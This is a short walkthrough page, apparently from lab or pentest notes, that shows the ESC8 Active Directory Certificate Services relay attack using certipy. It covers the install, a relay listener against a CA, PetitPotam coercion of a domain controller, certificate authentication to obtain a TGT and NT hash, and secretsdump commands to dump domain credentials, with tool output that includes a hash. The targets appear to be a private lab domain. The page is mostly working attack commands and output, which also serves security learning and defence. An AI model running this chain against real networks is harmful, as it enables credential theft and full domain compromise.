ESC8 - with certipy

ADCS attack tool certipy to automatise a lots of things.

Let’s do the same attack with certipy, setup the listener :

Install Certipy

sudo pip3 install certipy-ad

sudo certipy relay -ca 192.168.56.23 -template DomainController

execute the coerce just like we did before with petitpotam

python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local

Now we got the certificate so we can get the NT hash of the DC and also the TGT with the command :

sudo certipy auth -pfx baltimore.pfx -dc-ip 192.168.56.12 

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759

export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local

# or with the hash

secretsdump.py -hashes ':aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759' -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local

PreviousESC8 - coerce to domain admin NextADCS - ESC1

Last updated 2 years ago

hashtagInstall Certipy

Install Certipy